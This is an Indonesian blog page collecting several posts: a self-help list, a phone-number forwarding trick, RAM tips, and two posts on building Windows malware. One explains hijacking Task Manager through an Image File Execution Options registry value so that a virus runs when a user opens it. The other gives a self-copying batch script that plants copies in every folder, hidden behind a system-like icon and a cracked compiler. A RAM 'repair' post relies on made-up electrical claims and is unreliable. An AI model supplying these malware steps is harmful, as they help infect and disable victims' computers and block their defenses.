Penyakit Mental Manusia
10 PENYAKIT mental MANUSIA
Penyakit merupakan sesuatu yang bersifat merugikan untuk diri baik yang bersifat fisik maupun mental. Penyakit secara fisik mungkin dapat dengan mudah terdeteksi sehingga dapat diketahui cara pengobatannya. Namun bagaimana dengan penyakit yang menyerang mental manusia????. Penyakit ini tidak nampak dan terdakang sulit untuk kita ubah karena biasanya merupakan kebiasaan dalam diri. Berikut ini adalah 10 jenis penyakit yang terkadang mungkin ada dalam diri anda dan seharusnya anda pahami dan hilangkan.

1. MENYALAHKAN ORANG LAIN


Itu penyakit P dan K, yaitu Primitif dan Kekanak-kanakan. Menyalahkan orang lain adalah pola pikir orang primitif. Di pedalaman Afrika, kalau ada orang yang sakit, yang Dipikirkan adalah : Siapa nih yang nyantet ? Selalu “siapa” Bukan “apa” penyebabnya. Bidang kedokteran modern selalu mencari tahu “apa” sebabnya, bukan “siapa”. Jadi kalau kita berpikir menyalahkan orang lain, itu sama dengan sikap primitif. Pakai koteka aja deh, nggak usah pakai dasi dan jas.

Kekanak-kanakan. Kenapa ? Anak-anak selalu nggak pernah mau disalahkan. Kalau ada piring yang jatuh,” Adik tuh yang salah”, atau ” mbak tuh yang salah”. Anda pakai celana monyet aja kalau bersikap begitu. Kalau kita manusia yang berakal dan dewasa selalu akan mencari sebab terjadinya sesuatu.

2. MENYALAHKAN DIRI SENDIRI

Menyalahkan diri sendiri bahwa dirinya merasa tidak mampu. Ini berbeda dengan MENGAKUI KESALAHAN. Anda pernah mengalaminya ? Kalau anda bilang tidak pernah, berarti anda bohong. “Ah, dia sih bisa, dia ahli, dia punya jabatan, dia berbakat dsb, Lha saya ini apa ?, wah saya nggak bisa deh. Dia S3, lha saya SMP, wah nggak bisa deh. Dia punya waktu banyak, saya sibuk, pasti nggak bisa deh”. Penyakit ini seperti kanker, tambah besar, besar di dalam mental diri sehingga bisa mencapai “improper guilty feeling”.

Jadi walau yang salah partner, anak buah, atau bahkan atasan, berani bilang “Saya kok yang memang salah, tidak mampu dsb”. Penyakit ini pelan-pelan bisa membunuh kita. Merasa in feri or, kita tidak punya kemampuan. Kita sering membandingkan keberhasilan orang lain dengan kekurangan kita, sehingga keberhasilan orang lain dianggap Wajar karena mereka punya sesuatu lebih yang kita tidak punya.

3. TIDAK PUNYA GOAL / CITA-CITA

Kita sering terpaku dengan kesibukan kerja, tetapi arahnya tidak jelas. Sebaiknya kita selalu mempunyai target kerja dengan milestone. Buat target jangka panjang dan jangka pendek secara tertulis. Ilustrasinya kayak gini : Ada anjing jago lari yang sombong. Apa sih yang nggak bisa saya kejar, kuda aja kalah sama saya. Kemudian ada kelinci lompat-lompat, kiclik, kiclik, kiclik. Temannya bilang:

“Nah tuh ada kelinci, kejar aja”. Dia kejar itu kelinci, wesss…., kelinci lari lebih kencang, anjingnya ngotot ngejar dan kelinci lari sipat-kuping (sampai nggak dengar / peduli apa-apa), dan akhirnya nggak terkejar, kelinci masuk pagar. Anjing kembali lagi ke temannya dan diketawain.

“Ah lu, katanya jago lari, sama kelinci aja nggak bisa kejar. Katanya lu paling kencang”.

“Lha dia goalnya untuk tetap hidup sih, survive, lha gua goalnya untuk fun aja sih”.

Kalau “GOAL” kita hanya untuk “FUN”, isi waktu aja, ya hasilnya cuma terengah-engah saja.


4. MEMPUNYAI “GOAL”, TAPI NGAWUR MENCAPAINYA

Biasanya dialami oleh orang yang tidak “teachable”. Goalnya salah, focus kita juga salah, jalannya juga salah, arahnya juga salah. Ilustrasinya kayak gini : ada pemuda yang terobsesi dengan emas, karena pengaruh tradisi yang mendewakan emas. Pemuda ini pergi ke pertokoan dan mengisi karungnya dengan emas dan seenaknya ngeloyor pergi. Tentu saja ditangkap polisi dan ditanya. Jawabnya : Pokoknya saya mau emas, saya nggak mau lihat kiri-kanan.

5. MENGAMBIL JALAN PINTAS, SHORT CUT

Keberhasilan tidak pernah dilalui dengan jalan pintas. Jalan pintas tidak membawa orang ke kesuksesan yang sebenarnya, real success, karena tidak mengikuti proses. Kalau kita menghindari proses, ya nggak matang, kalaupun matang ya dikarbit. Jadi, tidak ada tuh jalan pintas. Pemain bulutangkis Indonesia bangun jam 5 pagi, lari keliling Senayan, melakukan smesh 1000 kali. Itu bukan jalan pintas. Nggak ada orang yang leha-leha tiap hari pakai sarung, terus tiba- tiba jadi juara bulu tangkis. Nggak ada ! Kalau anda disuruh taruh uang 1 juta, dalam 3 minggu jadi 3 juta, masuk akal nggak tuh? Nggak mungkin !. Karena hal itu melawan kodrat.


6. MENGAMBIL JALAN TERLALU PANJANG, TERLALU SANTAI

Analoginya begini : Pesawat terbang untuk bisa take-off, harus mempunyai kecepatan minimum. Pesawat Boeing 737, untuk dapat take- off, memerlukan kecepatan minimum 300 km/jam. Kalau kecepatan dia cuma 50 km/jam, ya Cuma ngabis-ngabisin avtur aja, muter-muter aja. Lha kalau jalannya, runwaynya lurus anda cuma pakai kecepatan 50 km/jam, ya nggak bisa take-off, malah nyungsep iya. Iya kan ?


7. MENGABAIKAN HAL-HAL YANG KECIL

Dia maunya yang besar-besar, yang heboh, tapi yang kecil-kecil nggak dikerjain. Dia lupa bahwa struktur bangunan yang besar, pasti ada komponen yang kecilnya. Maunya yang hebat aja. Mengabaikan hal kecil aja nggak boleh, apalagi mengabaikan orang kecil.

8. TERLALU CEPAT MENYERAH

Jangan berhenti kerja pada masa percobaan 3 bulan. Bukan mengawali dengan yang salah yang bikin orang gagal, tetapi berhenti pada tempat yang salah. Mengawali dengan salah bisa diperbaiki, tetapi berhenti di tempat yang salah repot sekali.


9. BAYANG BAYANG MASA LALU

Wah puitis sekali, saya suka sekali dengan yang ini. Karena apa ? Kita selalu penuh memori kan ? Apa yang kita lakukan, masuk memori kita, minimal sebagai pertimbangan kita untuk langkah kita berikutnya. Apalagi
kalau kita pernah gagal, nggak berani untuk mencoba lagi. Ini bisa balik lagi ke penyakit nomer-3. Kegagalan sebagai akibat bayang-bayang masa lalu yang tidak terselesaikan dengan semestinya. Itu bayang-bayang negatif. Memori kita kadang- kadang sangat membatasi kita untuk maju ke depan. Kita kadang-kadang lupa bahwa hidup itu maju terus. “Waktu” itu maju kan ?. Ada nggak yang punya jam yang jalannya terbalik ?? Nggak ada kan ?

Semuanya maju, hidup itu maju. Lari aja ke depan, kalaupun harus jatuh, pasti ke depan kok. Orang yang berhasil, pasti pernah gagal. Itu memori negatif yang menghalangi kesuksesan.

10. MENGHIPNOTIS DIRI DENGAN KESUKSESAN SEMU

Biasa disebut Pseudo Success Syndrome. Kita dihipnotis dengan itu. Kita kalau pernah berhasil dengan sukses kecil, terus berhenti, nggak kemana-mana lagi.Sudah puas dengan sukses kecil tersebut. Napoleon pernah menyatakan: “Saat yang paling berbahaya datang bersama dengan kemenangan yang besar”. Itu saat yang paling berbahaya, karena orang lengah, mabuk kemenangan. Jangan terjebak dengan goal-goal hasil yang kecil, karena kita akan menembak sasaran yang besar, goal yang jauh. Jangan berpuas diri, ntar jadi sombong, terus takabur
Sudah saatnya kita memperbaiki kehidupan kita. Kesempatan terbuka lebar untuk siapa saja yang ingin maju.
Label: 0 komentar | edit post
Reaksi: 
Perbedaan Virus dan Worm
Banyak terjadi kesalah pahaman mengenai virus dan worm. Misalnya saja worm: Gadis Desa, itu hanya sebuah worm yang kecil namun kebanyakan dari khalayak umum menyebut worm itu virus Gadis Desa. Nah lo kok worm bisa jadi virus sih?? Ternyata pemahaman khalayak umum mengenai worm dan virus itu masih kurang. Mereka kadang menyebut program yang mencemari, memiliki kemampuan untuk menggandakan diri itu, mereka sebut itu virus. Agar bisa lebih memahaminya,Mari kita pelajari lebih mendalam perbedaan keduanya???

Download artikel lengkap:
Label: 0 komentar | edit post
Reaksi: 
GSM dan CDMA jadi satu
Perkembangan teknologi dan informasi sudah kian sangat cepat. Kalau ingat beberapa dekade yang lalu untuk bisa memperoleh informasi atau berita yang aktual alat satu-satunya yang dapat digunakan hanyalah radio. Mungkin hanya segelintir orang saja yang sudah mempunyai media televisi jadul BW (bukan blogwalking tapi black white), saat itu pun hanya ada TVRI yang dapat dijangkau masyarakat luas (itu keadaan di kampung saya, tidak tahu kalau di kota). Demikian pesatnya perkembangan yang terjadi sehingga menuntut para penyedia jasa untuk saling berlomba juga. Dulu boro-boro untuk bisa komunikasi lewat 3G, mau konfirmasi janjian aja pake surat, qqqq ... Namun, sekarang coba kita lihat perkembangannya, untuk tahun 2008 ini aja deh, produk produk baru terutama dalam hal ini produk terbaru dari alat telekomunikasi kita silakan anda cek di om gugle, pasti banyak deh. Saya tidak akan (eh belum akan, soalna gak tahu besok-besok) menyampaikan soal HP terbaru tapi saya ada sedikit info yang mungkin berguna bagi anda yang belum mengetahuinya (bagi yang sudah tahu mohon koreksi saya).

Seperti yang kita tahu, dari jenisnya HP ada 2 jenis HP yang sekarang marak diperjualbelikan, meskipun banyak juga provider lain yang gencar untuk mencari lahan juga. 2 jenis layanan HP ini adalah CDMA dan GSM. Perbedaan mendasar dari teknologi CDMA adalah sistem modulasinya. Modulasi CDMA merupakan kombinasi FDMA (Frekuensi Division Multiple Access) dan TDMA (Time Division Multiple Access). Pada teknologi FDMA, 1 kanal frekuensi melayani 1 sirkuit pada satu waktu, sedangkan pada TDMA, 1 kanal frekuensi dipakai oleh beberapa pengguna dengan cara slot waktu yang berbeda. Pada CDMA beberapa pengguna bisa dilayani pada waktu bersamaan dan frekuensi yang sama, dimana pembedaan satu dengan lainnya ada pada sistem coding-nya, sehingga penggunaan spektrum frekuensinya teknologi CDMA sangat efisien. Kelebihan yang ditawarkan CDMA antara lain kualitas suara dan data, harga atau tarif yang lebih murah, investasi yang lebih kecil, dan keamanan dalam berkomunikasi (tidak mudah disadap). Teknologi GSM dengan GPRS nya akan terlibas dengan content pada CDMA karena keterbatasan akan lebar data dan aplikasi multimedia pada teknologi GSM. Kelebihan teknologi berbasis GSM di Indonesia adalah coverage yanga luas dan roaming jelajah yang sangat luas baik dalam negeri bahkan seluruh dunia, sedangkan CDMA dengan telkomflexi masih sangat terbatas. Untuk mengetahui lebih detailnya lagi-lagi saya sarankan tanya ke om google, biar lebih jelas :).

Dikarenakan perbedaan antara kedua jenis teknologi ini terkadang membuat orang bingung harus memilih yang mana, di satu sisi, CDMA dikenal karena biaya operasional yang lebih murah, namun disisi lain GSM punya keunggulan jangkauan yang lebih luas.

Berikut ini trik untuk dapat menyisipkan kartu CDMA ke nomor GSM. Manfaat yang bisa didapatkan dengan menyisipkan nomor CDMA ke nomor GSM antara lain:

* HP GSM akan memiliki 2 nomor sekaligus dalam satu Handphone.
* HP anda akan dapat dihubungi secara lokal bahkan lewat telepon koin pun bisa.
* Nomor CDMA lokal anda masih dapat dihubungi sekalipun berada diluar daerah.
* Tidak perlu beli HP CDMA untuk menggunakan nomor CDMA.


Tapi ini bukannya tanpa kelemahan maupun keterbatasan :

1. Nomor CDMA lokal anda hanya dapat digunakan untuk menerima telepon saja, sedangkan fungsi untuk menelpon, mengirim dan menerima SMS tetap ditangani oleh nomor GSM.
2. Bagaimanapun juga pulsa nomor CDMA tetap harus diisi sekalipun tidak digunakan, karena nomor CDMA bisa tidak berfungsi kalau pulsa hangus atau kosong.
3. Dikenakan biaya airtime yang dipotong langsung dari pulsa CDMAnya walaupun cuma terima telepon saja.

Trik ini bisa dimanfaatkan bagi anda yang sibuk dan harus mobile ke luar daerah, ataupun pada saat pulang kampung ataupun liburan.

Yang harus disiapkan yaitu:

1. HP GSM dan nomor GSM tentunya untuk ditambahkan nomor CDMA.
2. HP CDMA sebaiknya dengan Fasilitas Ruim Dual Band yang menggunakan kartu dan bukan yang di injek) seperti : Nokia 2115, 6015, 6016, 6585, dll. Dan nggak perlu beli, karena cuma dipakai sebentar aja, bisa pinjem sama saudara, temen, tetangga ataupun tempat dimana beli nomor CDMA nya.
3. Kartu Perdana CDMA, pilih yang sesuai untuk di sisipkan ke nomor GSM anda.
4. Star One untuk : Mentari, IM3, dan Matrix
5. Flexy untuk : Simpati, Kartu AS, Kartu Hallo
6. Esia untuk : Simpati, Kartu AS, Kartu Hallo dan XL


Pemilihan kartu harus benar-benar sesuai, jika tidak maka trik ini nggak akan berhasil.

Cara Menyisipkannya:

1. Masukkan kartu perdana CDMA yang telah dibeli kedalam HP CDMA .
2. Lakukan Pengaktifan:

Untuk Star One :

* Tekan *92 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *92081512345678
* Tekan OK/Yes.. lalu dengarkan
* Setelah selesai tutup HP CDMA nya
* Di test dengan menelpon ke No. CDMA, jika yang berdering adalah HP GSM berarti anda telah berhasil !!

Untuk Flexy :

* Tekan *71 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *7108125712345
* Tekan OK/Yes dan dengarkan...
* Setelah selesai tutup HP CDMA nya
* Di test dengan menelpon ke No.CDMA, jika HP GSM anda berdering, maka anda telah berhasil !!

Untuk Esia :

* Tekan *12 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *12081612345678
* Tekan OK/Yes dan dengarkan...
* Setelah selesai tutuh HP CDMA nya
* Di test kembali dengan menelpon ke No.CDMA, jika HP GSM anda yang berdering, maka anda telah berhasil !!


Suatu saat mungkin kita ingin mengembalikan nomor CDMA kedalam kartu asalnya agar bisa digunakan di HP CDMA, berikut cara-cara untuk mengembalikannya.

Untuk Star One

* Tekan *920
* Tekan OK/Yes dan dengarkan...
* Setelah selesai tutup
* Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.

Untuk Flexy

* Tekan *710
* Tekan OK/Yes dan dengarkan...
* Setelah selesai tutup
* Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.

Untuk Esia

* Tekan *120
* Tekan OK/Yes dan dengarkan...
* Setelah selesai tutup
* Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.

Selamat mencoba, semoga bermanfaat.

diambil dari berbagai sumber
Label: 0 komentar | edit post
Reaksi: 
Tips Menambah RAM dengan Flashdisk
Spesifikasi yang tinggi pada PC desktop maupun Notebook kita jika tidak diimbangi dengan yang namanya RAM, maka sama saja kinerjanya juga kurang optimal. Seperti halnya website ataupun blog kita, PC maupun laptop perlu juga dioptimasi. Meskipun saya juga masih belum tahu bagaimana cara optimasi blog agar search engine friendly, tapi setidaknya saya belajar selangkah demi selangkah. Lalu bagaimana cara optimasi PC atau notebook kita? Selain spesifikasi yang tinggi diperlukan juga ram yang besar pula. Jika kita mampu, tentu saja tidak akan menjadi masalah untuk mendapatkan PC berspesifikasi tinggi sekaligus dengan ram yang besar, namun bagi yang pas-pasan (seperti saya) atau sudah terlanjur membeli PC atau laptop dengan ram minim ternyata ada cara untuk bisa mengakalinya, namun bukan berarti tidak mengeluarkan dana sama sekali. Untuk bisa menambah kapasitas ram diperlukan ruang untuk cache memory, nah untuk itu kita memerlukan sebuah flash disk.

Cara menambah ram dengan flash disk yang pertama adalah dengan menggunakan sofware. Sofware itu adaah eBoostr. Dengan eboostr prosesnya cachenya otomatis. Sebagai catatan bahwa jika flash disk digunakan sebagai penambah ram maka flash disk tersebut tidak bisa digunakan lagi untuk menyimpan data. Jika anda ingin mencoba dengan sofware tersebut anda bisa googling atau bisa download langsung dari sini.

Cara kedua yaitu dengan mengubah virtual memory yang ada pada properties My Computer. Langkah-langkahnya sebagai berikut:

* Pasangkan flashdisk ke komputer
* Klik kanan pada My Computer lalu pilih Properties
* Klik tab Advanced, lalu klik tombol Settings pada kotak Performance
* Pada jendela yang muncul, klik tab Advanced lalu klik tombol Change pada kotak Virtual memory
* Pilih drive C, kemudian pilih No paging file. Jika sudah lanjutkan dengan mengklik tombol Set
* Pilih drive 'flashdisk' anda (misalkan drive F), biasanya diberi nama Removable disk jika anda belum memberi nama pada flashdisk tersebut. Setelah itu pilih System managed size dan dilanjutkan dengan mengklik tombol Set
* Perhatikan pada kotak Total paging file size for All drives. Nilai Recommended nya jangan melebihi kapasitas flashdisk
* Jika memang lebih maka anda bisa memasukkan 'nilai total' dari kapasitas flashdisk. Caranya klik pilihan Custom Size lalu pada Initial Size dan
* Maximum Size diisi dengan nilai total dari kapasitas flashdisk. Anda harus menyisakan 5 - 6 Mb. Ini merupakan persyaratan dari Windows XP itu sendiri. Jika sudah, klik tombol Set
* Klik OK lalu Restart komputer

Selamat mencoba, semoga bermanfaat ...

Sumber: diambil dari berbagai sumber
Label: 0 komentar | edit post
Reaksi: 
Memperbaiki RAM
Kali ini saya akan berbagi tips dan pengalaman saya tentang menangani memory PC (SDRAM,DDRAM) yang sudah anda anggap mati (asal tidak mengalami kerusakan fisik yang parah, misalnya terbakar atau hancur/patah),

karena biasanya menurut yang saya lihat bila memory sudah di nyatakan mati oleh pemilik PC atau oleh teknisi komputer maka biasanya langsung saja di ganti dengan membeli memory yang baru, padahal masih ada kemungkinan memory tersebut di bikin hidup atau berfungsi lagi.
Berikut ini saya punya tips untuk menangani memory yang sudah di anggap mati tersebut berdasarkan pengalaman selama menggeluti dunia hardware , dengan akurasi dia atas 70 %, jadi misalnya anda memiliki 10 keping memory mati maka ada kemungkinan 7 keping masih bisa di selamatkan…cukup lumayan kan.? kita bisa menghemat uang beberapa ratus ribu utntuk perkepingnya.Ok, langsung saja siapkan memory mati tersebut, dan peralatan yang di perlukan adalah Avometer.
1. Bersihkan memory tersebut dengan cara menggosok pin-pin memory tersebut dengan kain dengan tujuan membersihkan, boleh juga di beri Tiner sedikit supaya lebih bersih dari debu, dan gesekan dengan kain tersebut juga akan memancing ion-ion pada pin memory menjadi tersimulasi agar konduktornya lebih aktif.
2. Arahkan skala Avometer pada Ohm (skala untuk mengukur hambatan), bebas boleh pada posisi 1K, 10K, 100K…
3. Ambil jarum negative (-) Avometer (kabel warna hitam) lalu tempelkan pada salah satu pin/kaki memory, dan jarum positive (kabel warna merah) gesekan pada pada kumpulan kaki-kaki IC/chipset memory ,bila memory memiliki 8 buah IC misalnya maka gesekan jarum (+) tersebut ke kaki-kaki 8 IC tersebut.
4. Selesai….silahkan coba pasang memory tersebut pada slotnya di Mainboard….
Note:
Proses ini adalah memanfaatkan aliran arus listrik dari batere Avometer yang di alirkan ke dalam sirkuit-sirkuit IC/Chipset memory . Cara kerja proses ini adalah seperti halnya proses Clear CMOS pada Mainboard apabila Mainboard mengalami crash dan tidak mau hidup, yaitu terjadinya gangguan atau penyumbatan pada perjalanan arus listrik sehingga arus yang di
perlukan untuk untuk pengaktifan suatu system tidak terpenuhi….atau seperti ilustrasi orang yang pingsan atau koma lalu kita coba bangunkan dengan cara di pancing syaraf-syarafnya untuk aktif dan sadar dengan cara di siram air, di setrum.dsb.

Sumber :http://teguhtheevolution.blogspot.com/
Label: 0 komentar | edit post
Reaksi: 
Menyisipkan Virus Pada Windows Task Manager
Windows Task Manager merupakan tools bawaan windows untuk memantau aplikasi-aplikasi yang sedang berjalan, baik yang tampil maupun yang berjalan secara background. Melalui aplikasi ini user bisa melakukan penghentian suatu proses background secara paksa, menghentikan proses yang tidak dikehendaki atau menghentikan suatu aplikasi yang mengalami kondisi Not Responding.



Begitu pula ketika tersadar bahwa komputer kesayangannya terserang Virus/Worm, kebanyakan user akan secara reflek menggunakan tiga jari sakti-nya untuk menekan [Ctrl]+[Alt]+[Del] guna memanggil Windows Task manager dengan tujuan menghentikan proses si Virus/Worm.



Cara lain untuk memanggil Task Manager ialah dengan melakukan klik kanan pada area kosong Taskbar lalu memilih menu Task manager. Bisa juga dengan mengetikkan TASKMGR pada kotak dialog RUN (Start -> Run). Atau dengan mengeksekusi langsung file taskmgr.exe yang berada di system directory (C:\WINDOWS\System32\).



Karena kemampuannya untuk memantau proses yang sedang berjalan dan menghentikannya secara paksa inilah yang membuat kebanyakan penulis Virus akan berusaha untuk mencegah user mengakses Windows Task Manager agar Virus/Worm yang diciptakannya sulit dihentikan.



Jika Anda sedang melakukan eksperimen dengan Virus/Worm, ada sedikit trik untuk 'menyisipkan' Virus/Worm Anda pada Windows Task Manager supaya nantinya ketika user mengakses Windows Task Manager justru Worm/Virus Andalah yang dijalankan, bukan Windows Task manager itu sendiri.



Okay, kita mulai eksperimen kita ;)



1. Bukalah Registry Editor, (Start) -> (Run) ketik REGEDIT

2. Pergilah ke lokasi berikut:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe



3. Buatlah sebuah string value dengan nama Debugger (Klik kanan pada area kosong

panel sebelah kanan, pilih New lalu klik String Value. Beri nama Debugger).

4. Klik ganda pada String Value yang baru Anda buat tadi. Isikan lokasi Virus

Anda pada form isian Value Data. Atau sebagai percobaan, masukkan saja lokasi

Windows Command Processor -> C:\WINDOWS\System32\cmd.exe

Kemudian Klik [OK] sesudahnya.

5. Kini cobalah untuk mengakses Windows Task Manager dengan menekan kombinasi

[Ctrl]+[Alt]+[Del] atau klik kanan pada area kosong Taskbar lalu pilih menu

Task manager ... atau.. terserah Anda laah.. ^_^ dan... TA..DAAAAAA....!!
Task manager Anda tidak akan tampil. Yang berjalan justru Windows Command Processor sesuai dengan yang Anda isikan pada Value Data tadi.



Nah, kini Anda bisa mengimplementasikannya dalam Virus/Worm ciptaan anda. Dengan demikian user tidak akan bisa mengakses Windows Task Manager. Ketika user berusaha melakukan pengaksesan Task Manager, justru Virus/Worm Andalah yang berjalan ;)



Trik ini sebenarnya bisa juga diterapkan untuk hal-hal baik. Misalnya saja Anda merasa kurang puas dengan Windows Task Manager dan Anda ingin mengganti aplikasi tersebut dengan aplikasi sejenis yang memiliki kemampuan lebih baik, maka Anda bisa menerapkan trik ini untuk tujuan tersebut.

Sumber :http://teguhtheevolution.blogspot.com/
Label: 0 komentar | edit post
Reaksi: 
Bikin Virus dengan Perintah CMD
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.

Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

Sumber :http://teguhtheevolution.blogspot.com/
Label: 0 komentar | edit post
Reaksi: 

  • Free Blog Content

    ShoutMix chat widget
    Loading...